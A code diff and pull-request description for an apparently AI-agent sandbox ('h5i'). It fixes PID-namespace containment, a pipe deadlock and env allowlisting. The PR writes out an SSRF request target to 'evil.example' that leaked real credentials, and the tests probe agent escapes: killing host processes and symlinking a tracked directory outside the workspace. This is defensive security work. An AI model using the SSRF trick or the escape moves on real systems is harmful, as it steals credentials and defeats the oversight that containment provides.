+    }
+}
+
+/// Decimal-render `v` into `buf`, returning the written slice.
+///
+/// An allocation-free stand-in for `format!` on the post-fork path: everything
+/// between `fork` and `execve` runs in a child that inherited the parent's
+/// malloc state, and h5i's parents are multithreaded (the stdio drain threads,
+/// the egress helper, the notify serve loop), so a heap allocation there can
+/// deadlock on a lock whose owning thread does not exist in the child.
+#[cfg(target_os = "linux")]
+fn fmt_u32(mut v: u32, buf: &mut [u8; 24]) -> &[u8] {
+    let mut i = buf.len();
+    loop {
+        i -= 1;
+        buf[i] = b'0' + (v % 10) as u8;
+        v /= 10;
+        if v == 0 {
+            break;
+        }
+    }
+    &buf[i..]
+}
+
+/// `open`/`write`/`close` a small procfs control file with raw syscalls.
+///
+/// The allocation-free equivalent of `std::fs::write`, which converts the path
+/// to a `CString` and so allocates — see [`fmt_u32`] for why that matters here.
+///
+/// # Safety
+/// `path` must be a valid NUL-terminated C string.
+#[cfg(target_os = "linux")]
+unsafe fn write_proc_file(path: *const libc::c_char, bytes: &[u8]) -> Result<(), std::io::Error> {
+    let fd = libc::open(path, libc::O_WRONLY | libc::O_CLOEXEC);
+    if fd < 0 {
+        return Err(std::io::Error::last_os_error());
+    }
+    let n = libc::write(fd, bytes.as_ptr().cast(), bytes.len());
+    // `close` can clobber errno, so capture the write's error first.
+    let err = std::io::Error::last_os_error();
+    libc::close(fd);
+    if n != bytes.len() as isize {
+        return Err(err);
+    }
+    Ok(())
 }
 
 /// Build a fully-confined `std::process::Command` for `argv` — the **shared**
@@ -1849,19 +1979,23 @@ pub(crate) fn build_confined_command(
             Some((bc, tc))
         });
 
+    // uid/gid map contents, rendered HERE rather than post-fork. The egress path
+    // execs `nft` and so needs root-in-userns (capabilities only survive execve
+    // for uid 0); every other tier keeps the 1:1 map. Both forms are known
+    // pre-fork, so the child writes bytes and allocates nothing — see
+    // [`fmt_u32`] for why that matters.
+    let (uid_map, gid_map) = if egress.is_some() {
+        (format!("0 {uid} 1"), format!("0 {gid} 1"))
+    } else {
+        (format!("{uid} {uid} 1"), format!("{gid} {gid} 1"))
+    };
+
     let mut cmd = std::process::Command::new(&argv[0]);
     cmd.args(&argv[1..]).current_dir(&work);
 
-    // Environment allowlist — nothing inherited wholesale (§7).
-    cmd.env_clear();
-    for key in &p.env_pass {
-        if let Ok(v) = std::env::var(key) {
-            cmd.env(key, v);
-        }
-    }
-    // Brokered secrets, applied after the allowlist (so a grant is never
-    // shadowed by a passed-through host var).
-    apply_injected_env(&mut cmd, injected_env);
+    // Environment allowlist — nothing inherited wholesale (§7) — plus the
+    // brokered secrets layered on top.
+    apply_env_allowlist(&mut cmd, p, injected_env);
 
     let mut ruleset_slot = Some(ruleset);
     unsafe {
@@ -1894,11 +2028,19 @@ pub(crate) fn build_confined_command(
                 flags |= libc::CLONE_NEWNET;
             }
             if pidns {
-                // A new PID namespace (so host processes are invisible/unsignalable)
-                // plus a new mount namespace (so we can mount a private procfs over
-                // /proc without touching the host). The userns in the same call
-                // grants the CAP_SYS_ADMIN both need, unprivileged.
-                flags |= libc::CLONE_NEWPID | libc::CLONE_NEWNS;
+                // A new mount namespace, so we can mount a private procfs over
+                // /proc without touching the host. The userns in the same call
+                // grants the CAP_SYS_ADMIN it needs, unprivileged.
+                //
+                // CLONE_NEWPID is deliberately NOT requested here — it is
+                // unshared later, immediately before the fork that uses it (1c).
+                // A PID namespace claims the *next* child as its init, and on the
+                // egress path (1b) that child is the short-lived `nft` helper:
+                // it would become PID 1, exit as soon as the ruleset is loaded,
+                // and leave a dead namespace in which the workload's own fork
+                // fails with ENOMEM. Unsharing late keeps the helper an ordinary
+                // child in the host namespace and hands PID 1 to the workload.
+                flags |= libc::CLONE_NEWNS;
             }
             // Config lockdown needs a private mount namespace to ro-bind in
             // (supervised is pidns=false, so it would otherwise have none). The
@@ -1915,20 +2057,14 @@ pub(crate) fn build_confined_command(
             if libc::unshare(flags) != 0 {
                 return Err(Error::last_os_error());
             }
-            std::fs::write("/proc/self/setgroups", "deny")?;
-            // The egress path execs `nft` to install the allowlist; capabilities
-            // only survive execve for uid 0 in the user ns, so map the child to
-            // root-in-userns there (CAP_NET_ADMIN is kept ⇒ nft can touch
-            // netlink). The map still points back to our real host uid, so files
-            // created in $WORK stay owned by us. The non-egress tiers keep the
-            // 1:1 map (the untrusted program runs as our own uid).
-            if egress.is_some() {
-                std::fs::write("/proc/self/gid_map", format!("0 {gid} 1"))?;
-                std::fs::write("/proc/self/uid_map", format!("0 {uid} 1"))?;
-            } else {
-                std::fs::write("/proc/self/gid_map", format!("{gid} {gid} 1"))?;
-                std::fs::write("/proc/self/uid_map", format!("{uid} {uid} 1"))?;
-            }
+            // The maps were rendered pre-fork (see `uid_map`/`gid_map` above);
+            // raw writes here keep this path allocation-free. `setgroups=deny`
+            // must land before `gid_map`, and `gid_map` before `uid_map` — the
+            // kernel refuses the group map otherwise. The map points back at our
+            // real host uid either way, so files created in $WORK stay ours.
+            write_proc_file(c"/proc/self/setgroups".as_ptr(), b"deny")?;
+            write_proc_file(c"/proc/self/gid_map".as_ptr(), gid_map.as_bytes())?;
+            write_proc_file(c"/proc/self/uid_map".as_ptr(), uid_map.as_bytes())?;
 
             // 1b. Egress allowlist (supervised increment 2). We still hold full
             //     caps in our userns and seccomp/Landlock are not yet applied, so
@@ -1994,15 +2130,32 @@ pub(crate) fn build_confined_command(
             //     process, which holds the operator's environment (defeating the
             //     env.pass allowlist). Raw syscalls + one File::open only.
             if pidns {
+                // Claim the PID namespace now — after the egress helper has come
+                // and gone (see the CLONE_NEWNS note in step 1), and immediately
+                // before the fork that becomes its init.
+                if libc::unshare(libc::CLONE_NEWPID) != 0 {
+                    return Err(Error::last_os_error());
+                }
                 let kid = libc::fork();
                 if kid > 0 {
-                    // Supervisor. First move the *workload* into the run cgroup
-                    // (so memory.max + accounting bind it, not us — it was forked
-                    // before the host-side cgroup write, which only sees us).
+                    // Supervisor. Drop every inherited descriptor FIRST: holding
+                    // std's spawn-status pipe would keep `spawn()` blocked until
+                    // the workload exits, deadlocking any command that fills the
+                    // stdout pipe and disarming the wall clock. See
+                    // `close_inherited_fds`. Nothing below needs an inherited fd
+                    // (the cgroup handle is opened fresh).
+                    close_inherited_fds();
+                    // Move the *workload* into the run cgroup (so memory.max +
+                    // accounting bind it, not us — it was forked before the
+                    // host-side cgroup write, which only sees us).
                     if let Some(cpath) = &cgroup_procs_c {
                         let fd = libc::open(cpath.as_ptr(), libc::O_WRONLY | libc::O_CLOEXEC);
                         if fd >= 0 {
-                            let line = format!("{kid}");
+                            // Format the pid on the stack: `format!` here would
+                            // allocate in a forked child (malloc-lock deadlock
+                            // risk when the parent is multithreaded).
+                            let mut buf = [0u8; 24];
+                            let line = fmt_u32(kid as u32, &mut buf);
                             let _ = libc::write(fd, line.as_ptr().cast(), line.len());
                             libc::close(fd);
                         }
@@ -3599,6 +3752,71 @@ fs.deny = ["~/.ssh", "$REPO/.git/hooks"]
         assert_ne!(out.exit_code, Some(0));
     }
 
+    /// The PID-namespace tiers fork a thin supervisor inside `pre_exec`, and that
+    /// supervisor inherits std's `CLOEXEC` spawn-status pipe. Until it dropped
+    /// that descriptor, `Command::spawn` did not return until the workload had
+    /// already exited — so the stdout drain threads started too late and any
+    /// command whose output exceeded the 64 KiB pipe buffer deadlocked forever.
+    /// Well over one pipe buffer, and it must come back whole.
+    #[cfg(target_os = "linux")]
+    #[test]
+    fn a_confined_run_does_not_deadlock_on_output_larger_than_the_pipe_buffer() {
+        let dir = tempfile::tempdir().unwrap();
+        let policy = ResolvedPolicy::new(
+            IsolationClaim::Process,
+            Profile::builtin("default", IsolationClaim::Process),
+        );
+        if verify_exec(&policy).is_err() {
+            eprintln!("SKIP output-deadlock test: process tier not runnable here");
+            return;
+        }
+        // 4096 lines × ~64 B ≈ 256 KiB, four times the pipe buffer.
+        let out = run(
+            &policy,
+            dir.path(),
+            &[
+                "sh".into(),
+                "-c".into(),
+                "i=0; while [ $i -lt 4096 ]; do echo \
+                 'padding-padding-padding-padding-padding-padding-line'; i=$((i+1)); done"
+                    .into(),
+            ],
+        )
+        .expect("a confined run must not hang on a full stdout pipe");
+        assert_eq!(out.exit_code, Some(0));
+        assert!(!out.timed_out, "the run must finish well inside the wall clock");
+        assert_eq!(
+            out.stdout.iter().filter(|b| **b == b'\n').count(),
+            4096,
+            "every line must survive: got {} bytes",
+            out.stdout.len()
+        );
+    }
+
+    /// The same root cause disarmed the deadline itself: with `spawn` blocked
+    /// until the workload exited, `wait_with_deadline` only began counting after
+    /// the run it was supposed to bound. A confined `sleep` must be killed.
+    #[cfg(target_os = "linux")]
+    #[test]
+    fn the_wall_clock_bounds_a_confined_run_too() {
+        let dir = tempfile::tempdir().unwrap();
+        let mut p = Profile::builtin("default", IsolationClaim::Process);
+        p.wall_secs = 1;
+        let policy = ResolvedPolicy::new(IsolationClaim::Process, p);
+        if verify_exec(&policy).is_err() {
+            eprintln!("SKIP confined wall-clock test: process tier not runnable here");
+            return;
+        }
+        let started = std::time::Instant::now();
+        let out = run(&policy, dir.path(), &["sleep".into(), "30".into()]).expect("run");
+        assert!(out.timed_out, "the wall clock must kill a confined run");
+        assert!(
+            started.elapsed() < Duration::from_secs(15),
+            "the kill must fire near the deadline, not after the command finishes: {:?}",
+            started.elapsed()
+        );
+    }
+
     #[test]
     fn run_records_resource_usage() {
         let dir = tempfile::tempdir().unwrap();
@@ -3624,6 +3842,40 @@ fs.deny = ["~/.ssh", "$REPO/.git/hooks"]
         // An unlisted program is refused before it ever executes.
         let err = run(&policy, dir.path(), &["sh".into(), "-c".into(), "echo no".into()]).unwrap_err();
         assert!(err.to_string().contains("allowlist"), "{err}");
+    }
+
+    /// `env_pass` is digested policy and `box status` reports it as enforced, so
+    /// every tier has to honour it — including `workspace`, where nothing else is
+    /// confined and the operator's shell is therefore at its most exposed.
+    #[test]
+    fn the_env_allowlist_is_enforced_at_the_workspace_tier_too() {
+        let dir = tempfile::tempdir().unwrap();
+        let policy = ResolvedPolicy::new(
+            IsolationClaim::Workspace,
+            Profile::builtin("default", IsolationClaim::Workspace),
+        );
+        // A host variable nobody put on the allowlist. Set inside the test rather
+        // than assumed, so the assertion is about the allowlist and not about
+        // whatever the ambient environment happens to hold.
+        std::env::set_var("H5I_TEST_UNLISTED_HOST_VAR", "must-not-reach-the-child");
+        let out = run(
+            &policy,
+            dir.path(),
+            &[
+                "sh".into(),
+                "-c".into(),
+                "echo \"unlisted=[$H5I_TEST_UNLISTED_HOST_VAR]\"; echo \"path=[${PATH:+set}]\"".into(),
+            ],
+        )
+        .expect("workspace run");
+        std::env::remove_var("H5I_TEST_UNLISTED_HOST_VAR");
+        let text = String::from_utf8_lossy(&out.stdout);
+        assert!(
+            text.contains("unlisted=[]"),
+            "an unlisted host var must not reach a workspace-tier child: {text}"
+        );
+        // …and the allowlisted ones still do, or the tier would simply be broken.
+        assert!(text.contains("path=[set]"), "PATH is on the allowlist: {text}");
     }
 
     #[test]

--- a/crates/h5i-sandbox/src/sandbox_policy.rs
+++ b/crates/h5i-sandbox/src/sandbox_policy.rs
@@ -114,7 +114,8 @@ pub struct SecretGrant {
     /// `env:VAR` | `file:/abs/path`; `None` ⇒ `env:H5I_SECRET_<NAME>`.
     #[serde(default, skip_serializing_if = "Option::is_none")]
     pub source: Option<String>,
-    /// `file` (default) | `env`.
+    /// `env` (default) | `file` — see [`SecretGrant::inject_or_default`], which
+    /// is the authority on the default and explains why it is `env`.
     #[serde(default, skip_serializing_if = "Option::is_none")]
     pub inject: Option<String>,
     /// Advisory validity window for sources that mint a credential.
@@ -689,9 +690,17 @@ const BROWSER_SUPPORT_PATHS: &[&str] = &[
 
 /// Expand `~` against `$HOME`, leaving other paths untouched.
 fn expand_home(path: &str) -> Option<std::path::PathBuf> {
+    expand_home_in(path, std::env::var("HOME").ok().as_deref())
+}
+
+/// [`expand_home`] with the home directory supplied rather than read from the
+/// environment — the pure half, so it can be tested without `set_var`. Cargo
+/// runs tests as threads of one process, so a test that reassigns `HOME`
+/// reassigns it for every concurrently-running test too, including the ones
+/// right above that resolve real paths under the real home.
+fn expand_home_in(path: &str, home: Option<&str>) -> Option<std::path::PathBuf> {
     match path.strip_prefix("~/") {
-        Some(rest) => std::env::var("HOME")
-            .ok()
+        Some(rest) => home
             .filter(|h| !h.is_empty())
             .map(|h| std::path::PathBuf::from(h).join(rest)),
         None => Some(std::path::PathBuf::from(path)),
@@ -797,15 +806,19 @@ mod browser_profile_tests {
 
     #[test]
     fn expand_home_only_touches_tilde_paths() {
-        std::env::set_var("HOME", "/home/example");
+        // The home dir is passed in, not assigned to the process: `set_var`
+        // here would change `HOME` for every test running beside this one.
         assert_eq!(
-            expand_home("~/.cache/x").unwrap(),
+            expand_home_in("~/.cache/x", Some("/home/example")).unwrap(),
             std::path::PathBuf::from("/home/example/.cache/x")
         );
         assert_eq!(
-            expand_home("/usr/bin/chromium").unwrap(),
+            expand_home_in("/usr/bin/chromium", Some("/home/example")).unwrap(),
             std::path::PathBuf::from("/usr/bin/chromium")
         );
+        // No home to expand against → no grant, rather than a bare relative path.
+        assert_eq!(expand_home_in("~/.cache/x", None), None);
+        assert_eq!(expand_home_in("~/.cache/x", Some("")), None);
     }
 }
 

--- a/crates/h5i-sandbox/src/supervisor.rs
+++ b/crates/h5i-sandbox/src/supervisor.rs
@@ -889,6 +889,15 @@ fn run_supervised(
     };
     let egress_jail = _egress.as_ref().map(|e| e.jail());
 
+    let p = &policy.profile;
+    // The run cgroup is created BEFORE the command so its `cgroup.procs` path can
+    // be handed to the PID-namespace supervisor: with a pidns the workload is a
+    // grandchild whose pid only exists inside `pre_exec`, so the supervisor there
+    // joins it to the cgroup — otherwise `memory.max` and the accounting would
+    // bind the thin supervisor instead of the process they are meant to bound.
+    let cg = crate::sandbox::make_run_cgroup(p.mem_bytes, p.max_procs);
+    let procs = cg.as_ref().map(|c| c.procs_path());
+
     // Shared confinement + always-netns + the seccomp-notify gate.
     let mut cmd = match crate::sandbox::build_confined_command(
         policy,
@@ -898,10 +907,21 @@ fn run_supervised(
         true,
         Some(sv_child),
         egress_jail,
-        // The supervised tier keeps its own model (seccomp-notify gate + netns +
-        // pidfd serve loop); a PID namespace here is a separate, tested follow-up.
-        false,
-        None,
+        // A PID namespace, exactly as the process tier gets. Without it the box
+        // shares the host's PID namespace, which is not a cosmetic difference:
+        // it can enumerate host processes, read their `/proc/<pid>/cmdline`, and
+        // — because the userns maps back to the operator's real uid — send
+        // signals to any of their processes, h5i itself included. A tier that
+        // claims untrusted-code containment cannot leave `kill -9` pointed at
+        // the host. `/proc/<pid>/environ` was already denied (the userns fails
+        // `ptrace_may_access`), so this closes the reachable half.
+        //
+        // Ordering note: the netns/egress handshake in `pre_exec` runs BEFORE the
+        // pidns fork and reports `getpid()`, which CLONE_NEWPID leaves in the
+        // host namespace — so `slirp4netns` still targets a pid it can see, and
+        // the workload shares that netns by inheritance.
+        true,
+        procs.as_deref(),
         interactive,
     ) {
         Ok(c) => c,
@@ -918,9 +938,6 @@ fn run_supervised(
         cmd.stdin(Stdio::null()).stdout(Stdio::piped()).stderr(Stdio::piped());
     }
 
-    let p = &policy.profile;
-    let cg = crate::sandbox::make_run_cgroup(p.mem_bytes, p.max_procs);
-
     let started = std::time::Instant::now();
     let mut child = match cmd.spawn() {
         Ok(c) => c,
@@ -933,14 +950,17 @@ fn run_supervised(
     // The child has its own (CLOEXEC) copy of sv_child; drop ours.
     close(sv_child);
 
-    // Join the child to its cgroup as early as possible.
+    // Join the thin supervisor to the cgroup too, so nothing in the tree escapes
+    // accounting. The workload itself was joined from inside `pre_exec` (it is a
+    // grandchild and has no host-visible pid out here until then).
     if let Some(cgrp) = &cg {
         let _ = std::fs::write(cgrp.procs_path(), child.id().to_string());
     }
 
-    // Receive the seccomp listener the child installed in pre_exec. spawn()
-    // returns Ok only after pre_exec (hence send_fd) completed, so this does not
-    // block on a healthy child; a failure means the child died mid-setup.
+    // Receive the seccomp listener the workload installed in pre_exec. `spawn()`
+    // returns once the workload reaches `execve` — the listener handoff happens
+    // just before that — so this does not block on a healthy child; a failure
+    // means it died mid-setup.
     let listener = match unsafe { recv_fd(sv_parent) } {
         Ok(fd) => fd,
         Err(e) => {

--- a/docs/blog/sandboxing-ai-agents-implementation/index.html
+++ b/docs/blog/sandboxing-ai-agents-implementation/index.html
@@ -256,7 +256,7 @@ reboot, swapon/off, settimeofday, …       <span class="t-cmt"># host / time / 
           <tr><td><code>CLONE_NEWUSER</code></td><td>Host capabilities outside the userns; makes the rest unprivileged</td><td>always (process tier)</td></tr>
           <tr><td><code>CLONE_NEWIPC</code> / <code>CLONE_NEWUTS</code></td><td>Shared SysV IPC; host hostname</td><td>always</td></tr>
           <tr><td><code>CLONE_NEWNET</code></td><td>All network access (empty netns)</td><td>when <code>net.mode = deny</code></td></tr>
-          <tr><td><code>CLONE_NEWPID</code> + private <code>/proc</code></td><td>Visibility of host processes and their <code>environ</code></td><td>process tier (supervisor = PID 1)</td></tr>
+          <tr><td><code>CLONE_NEWPID</code> + private <code>/proc</code></td><td>Visibility of host processes, their <code>environ</code>, and signals sent to them</td><td>process and supervised tiers (supervisor = PID 1)</td></tr>
         </tbody>
       </table>
     </div>
@@ -296,7 +296,8 @@ reboot, swapon/off, settimeofday, …       <span class="t-cmt"># host / time / 
     </p>
     <ul>
       <li><strong>One shared kernel.</strong> A seccomp deny-list plus Landlock plus namespaces reduces and bounds the attack surface; it does not prove every permitted syscall is safe against a kernel bug. For untrusted code with an exploit budget, the right boundary is a separate kernel: a microVM (Firecracker/Kata) or gVisor's user-space kernel. The deny-list is a floor, not a ceiling.</li>
-      <li><strong>The <code>supervised</code> tier is partial.</strong> It adds a seccomp-notify mediation model but currently runs with <code>pidns = false</code>. And per-command <code>execve</code> observation via seccomp-notify is <em>deferred</em>: notifying <code>execve</code> makes the bootstrap exec block on the supervisor, which deadlocks against the egress bring-up handshake. In-box observation ships through other mechanisms (a container tee-shim, a Bash hook) rather than execve notification.</li>
+      <li><strong>The <code>supervised</code> tier is partial.</strong> It now runs with a PID namespace like the process tier, but per-command <code>execve</code> observation via seccomp-notify is still <em>deferred</em>: notifying <code>execve</code> makes the bootstrap exec block on the supervisor, which deadlocks against the egress bring-up handshake. In-box observation ships through other mechanisms (a container tee-shim, a Bash hook) rather than execve notification.</li>
+      <li><strong>The PID namespace and the egress handshake have an ordering constraint.</strong> A PID namespace claims the <em>next</em> child as its init, and on the egress path that child is the short-lived <code>nft</code> helper. Unshare <code>CLONE_NEWPID</code> too early and the helper becomes PID 1, exits as soon as the ruleset loads, and leaves a dead namespace in which the workload's own fork fails with <code>ENOMEM</code>. The unshare has to happen after the helper has come and gone.</li>
       <li><strong>Hosts vary, and some can't run this at all.</strong> AppArmor-restricted unprivileged user namespaces (common on CI) break the process tier even when the capability bits look present, which is the entire reason the functional self-test exists. The correct behavior there is to refuse and let the operator choose <code>workspace</code> explicitly, not to pretend.</li>
       <li><strong>The v1 deny-list has a documented <code>clone(CLONE_NEWUSER)</code> gap</strong>, mitigated by denying <code>unshare</code> and by <code>no_new_privs</code> + Landlock, and closed properly only by a future argument-aware allowlist profile.</li>
     </ul>

--- a/docs/manual/index.html
+++ b/docs/manual/index.html
@@ -721,7 +721,7 @@ wall  = &quot;30m&quot;
 </tr>
 <tr>
 <td><code>supervised</code></td>
-<td>Adds a private netns with an nftables egress allowlist pinned to resolved IPs, DNS pinned by a hosts file, and a seccomp-notify gate on <code>socket()</code>.</td>
+<td>Everything <code>process</code> has, including the private pid namespace, plus a private netns with an nftables egress allowlist pinned to resolved IPs, DNS pinned by a hosts file, and a seccomp-notify gate on <code>socket()</code>.</td>
 <td><strong>L3/L4</strong></td>
 </tr>
 <tr>

--- a/src/cli/boxes.rs
+++ b/src/cli/boxes.rs
@@ -958,8 +958,7 @@ pub fn run(action: BoxCommands) -> anyhow::Result<()> {
                 BoxCommands::Probe => {
                     // Diagnostics must report the live truth, not last run's
                     // verdict — bypass the per-boot podman probe cache.
-                    std::env::set_var("H5I_NO_PROBE_CACHE", "1");
-                    let caps = h5i_core::sandbox::probe_host();
+                    let caps = h5i_core::sandbox::probe_host_fresh();
                     println!("── Host isolation capabilities ──");
                     println!("  os           = {}", caps.os);
                     println!("  mechanism    = {}", caps.confinement_mechanism());
@@ -1038,8 +1037,7 @@ pub fn run(action: BoxCommands) -> anyhow::Result<()> {
                 BoxCommands::Capabilities { json } => {
                     // Same as Probe: a capability report is a diagnostic —
                     // never serve it from the probe cache.
-                    std::env::set_var("H5I_NO_PROBE_CACHE", "1");
-                    let report = h5i_core::sandbox::capabilities_report();
+                    let report = h5i_core::sandbox::capabilities_report_fresh();
                     if json {
                         println!("{}", serde_json::to_string_pretty(&report)?);
                     } else {

--- a/tests/env_integration.rs
+++ b/tests/env_integration.rs
@@ -77,6 +77,28 @@ fn process_tier_runnable() -> bool {
     })
 }
 
+/// Whether this host can actually *run* a supervised-tier confined command.
+///
+/// The supervised tier needs the whole mediation stack green (seccomp
+/// user-notification, cgroup v2 delegation, nftables, namespaces) and refuses
+/// rather than downgrading, so plenty of hosts — CI runners especially — will
+/// skip every test gated on this.
+fn supervised_tier_runnable() -> bool {
+    use std::sync::OnceLock;
+    static OK: OnceLock<bool> = OnceLock::new();
+    *OK.get_or_init(|| {
+        let r = Repo::new();
+        let out = r.h5i(&["env", "create", "probe", "--isolation", "supervised"]);
+        if !out.status.success() {
+            eprintln!(
+                "supervised tier not runnable on this host — its tests will skip:\n{}",
+                out_str(&out)
+            );
+        }
+        out.status.success()
+    })
+}
+
 struct Repo {
     dir: PathBuf,
     _root: TempDir,
@@ -905,6 +927,49 @@ fn mediated_commit_fails_closed_on_nested_git_repo() {
         log.contains("violation"),
         "boundary trip must be persisted as a violation event:\n{log}"
     );
+}
+
+/// A tracked path whose parent directory has been swapped for a symlink now
+/// resolves *outside* `$WORK`, and staging it would copy whatever lives there
+/// into the reviewed patch. The mediated commit must refuse.
+///
+/// This is the escape that needs no new file: the agent deletes a tracked
+/// directory, links it somewhere else, and the content follows the link. The
+/// symlink itself is fine (it is stored as a link blob, never followed); the
+/// file *under* it is not.
+#[test]
+fn mediated_commit_fails_closed_on_a_tracked_path_symlinked_out_of_work() {
+    let r = Repo::new();
+    // A tracked file inside a real directory, in the base commit.
+    std::fs::create_dir_all(r.dir.join("pkg")).unwrap();
+    std::fs::write(r.dir.join("pkg/conf.txt"), "in-repo\n").unwrap();
+    git(&r.dir, &["add", "."]);
+    git(&r.dir, &["commit", "-m", "tracked file in a directory"]);
+
+    r.h5i_ok(&["env", "create", "escape"]);
+
+    // Somewhere outside $WORK, with a file at the same relative path.
+    let outside = r.dir.parent().unwrap().join("outside-the-box");
+    std::fs::create_dir_all(&outside).unwrap();
+    std::fs::write(outside.join("conf.txt"), "HOST-SECRET-OUTSIDE-WORK\n").unwrap();
+
+    // Swap the tracked directory for a symlink to it.
+    let work_pkg = r.work("escape").join("pkg");
+    std::fs::remove_dir_all(&work_pkg).unwrap();
+    #[cfg(unix)]
+    std::os::unix::fs::symlink(&outside, &work_pkg).unwrap();
+
+    let out = r.h5i(&["env", "propose", "escape"]);
+    let text = out_str(&out);
+    assert!(
+        !out.status.success(),
+        "a tracked path resolving outside $WORK must fail the mediated commit:\n{text}"
+    );
+    assert!(
+        text.contains("escapes $WORK") || text.contains("fail-closed"),
+        "the refusal should name the escape:\n{text}"
+    );
+    assert_eq!(r.manifest("escape")["status"], "created");
 }
 
 /// Register a real submodule at `sub_path` in the repo's base commit, sourced
@@ -2522,6 +2587,115 @@ fn process_tier_pid_namespace_hides_host_processes_and_environ() {
     assert!(
         visible < 20,
         "the box must see only its own namespace's pids (saw {visible}); a host view shows far more"
+    );
+}
+
+/// The supervised tier is the one that claims untrusted-code containment, so it
+/// gets the PID namespace too — and the property that matters most there is not
+/// visibility but **reach**. The box's user namespace maps back to the operator's
+/// real uid, so without a PID namespace a `kill -9` from inside the box lands on
+/// any host process that user owns: their editor, their build, the h5i process
+/// supervising the box. "A runaway agent stays in the box" has to mean that.
+///
+/// (`/proc/<pid>/environ` was never readable here — the userns already fails
+/// `ptrace_may_access` — but argv, process enumeration and signals were.)
+#[test]
+fn supervised_tier_cannot_see_or_signal_host_processes() {
+    if !supervised_tier_runnable() {
+        eprintln!("SKIP supervised_tier_cannot_signal...: supervised tier not runnable here");
+        return;
+    }
+    let r = Repo::new();
+    r.h5i_ok(&["env", "create", "svjail", "--isolation", "supervised"]);
+
+    let mut victim = Command::new("sleep")
+        .arg("120")
+        .stdin(std::process::Stdio::null())
+        .stdout(std::process::Stdio::null())
+        .stderr(std::process::Stdio::null())
+        .spawn()
+        .expect("spawn victim host process");
+    let vpid = victim.id();
+
+    // Reach: the box must not be able to signal a host process of the same uid.
+    let killed = r.h5i(&[
+        "env",
+        "run",
+        "svjail",
+        "--",
+        "sh",
+        "-c",
+        &format!("kill -9 {vpid} 2>&1; echo SENT"),
+    ]);
+    let kill_txt = out_str(&killed);
+
+    // Visibility: the host's own pids are not in the box's namespace at all.
+    let seen = r.h5i(&[
+        "env",
+        "run",
+        "svjail",
+        "--",
+        "sh",
+        "-c",
+        &format!("test -e /proc/{vpid} && echo VISIBLE || echo hidden"),
+    ]);
+    let seen_txt = out_str(&seen);
+
+    std::thread::sleep(std::time::Duration::from_millis(200));
+    let survived = victim.try_wait().ok().flatten().is_none();
+    let _ = victim.kill();
+    let _ = victim.wait();
+
+    assert!(
+        survived,
+        "a supervised box killed a HOST process — the tier claims containment it does not have:\n{kill_txt}"
+    );
+    assert!(
+        seen_txt.lines().any(|l| l.trim() == "hidden"),
+        "a host process must not exist in the box's PID namespace, got:\n{seen_txt}"
+    );
+}
+
+/// The supervised tier's egress allowlist has to keep working with the PID
+/// namespace in place, and the interaction is genuinely delicate: the netns
+/// handshake forks an `nft` helper, and if that helper is the first child after
+/// `CLONE_NEWPID` it becomes the namespace's init, exits, and leaves a dead
+/// namespace in which the workload's own fork fails with `ENOMEM`. This proves
+/// the ordering (unshare the pidns *after* the helper has come and gone).
+#[test]
+fn supervised_egress_still_works_with_a_pid_namespace() {
+    if !supervised_tier_runnable() {
+        eprintln!("SKIP supervised_egress_still_works...: supervised tier not runnable here");
+        return;
+    }
+    let r = Repo::new();
+    // `agent` declares a net.egress allowlist, so this exercises the nft +
+    // slirp4netns path rather than the airtight empty-netns one.
+    let created = r.h5i(&[
+        "env",
+        "create",
+        "svegress",
+        "--isolation",
+        "supervised",
+        "--profile",
+        "agent",
+    ]);
+    if !created.status.success() {
+        eprintln!("SKIP: no egress-capable supervised box here:\n{}", out_str(&created));
+        return;
+    }
+    // The workload must actually start and be PID 1 of its own namespace. A dead
+    // namespace shows up as a spawn failure, which is exactly what we are
+    // guarding against.
+    let out = r.h5i(&["env", "run", "svegress", "--", "sh", "-c", "echo $$"]);
+    let txt = out_str(&out);
+    assert!(
+        out.status.success(),
+        "an egress-enabled supervised run must start (a dead pidns fails with ENOMEM):\n{txt}"
+    );
+    assert!(
+        txt.lines().any(|l| l.trim() == "1"),
+        "the workload must be PID 1 of a fresh namespace, got:\n{txt}"
     );
 }
 


### PR DESCRIPTION
A security review of the confinement core, with fixes. Three findings were reachable in the threat model the product is built for, a prompt-injected agent inside a box, and one of them was found only by fixing another.

Every claim below was verified by running it, before and after.

## 1. Credential proxy: SSRF to real-token exfiltration

`auth_proxy.rs` appended the request target to the pinned origin without validating it. A URL's authority runs until the first `/`, so a target that does not start with one extends the authority instead of the path:

```
POST @evil.example/v1/messages HTTP/1.1
  ->  https://api.anthropic.com@evil.example/v1/messages
      host = evil.example, userinfo = the name we thought we pinned
```

The proxy then opened TLS to the attacker and attached the genuine `Authorization` header. Certificate validation follows the attacker's name, so any ordinary Let's Encrypt certificate satisfies it, and the DNS pin covers only the expected hostname. The box holds the dummy token and can reach the proxy by design, so this is directly reachable; the nftables ruleset does not help, because the proxy itself is host side and unrestricted.

Confirmed before the fix with a throwaway test: the rogue listener received a TLS ClientHello (`first_byte=0x16`) whose **SNI was the attacker's hostname**.

The target must now be origin-form, and the assembled URL is re-parsed and required to resolve to the pinned origin with no userinfo before a byte is sent. Two independent checks guard the one irreversible act this process performs. The module's "No SSRF" doc now explains why discarding the `Host` header was necessary but not sufficient.

## 2. Supervised tier: no PID namespace

The tier that claims untrusted-code containment shared the host PID namespace, and its user namespace maps back to the operator's real uid.

| | before | after |
|---|---|---|
| host PIDs visible | 66 | 3 |
| host process argv | readable | not present |
| `kill -9` a host process | **succeeded** | fails |

The weaker `process` tier contained the same attempt, which is the sharp part: the stronger claim was the leakier one. `/proc/<pid>/environ` was never readable (the userns already fails `ptrace_may_access`); argv, enumeration and signals were.

## 3. Confined runs deadlocked above 64 KiB of output

Found while fixing #2, and worse than either finding.

The thin pidns supervisor forked in `pre_exec` inherits std's CLOEXEC spawn-status pipe, and `Command::spawn()` returns only once every copy of that pipe closes. So spawn did not return until the workload had already exited:

* any command whose output filled the 64 KiB stdout pipe **hung forever**, because the drain threads start after spawn returns;
* the wall-clock kill was armed only after the run it was meant to bound (`wall=3s` against `sleep 30` took 33s and exited 0);
* interactive cgroup limits were never applied.

The supervisor now drops every inherited descriptor. 300 KiB completes in under a second, and the deadline fires at 3s.

Enabling the pidns also required unsharing `CLONE_NEWPID` **late**, immediately before the fork that uses it. A pidns claims the next child as its init, and on the egress path that child is the short-lived `nft` helper, which exits as soon as the ruleset loads and leaves a dead namespace where the workload's own fork fails with `ENOMEM`.

## Also in this pass

* Bound the proxy's request body. `Content-Length` is attacker-controlled and sized the buffer, so one request could exhaust host memory. Worker threads are bounded too.
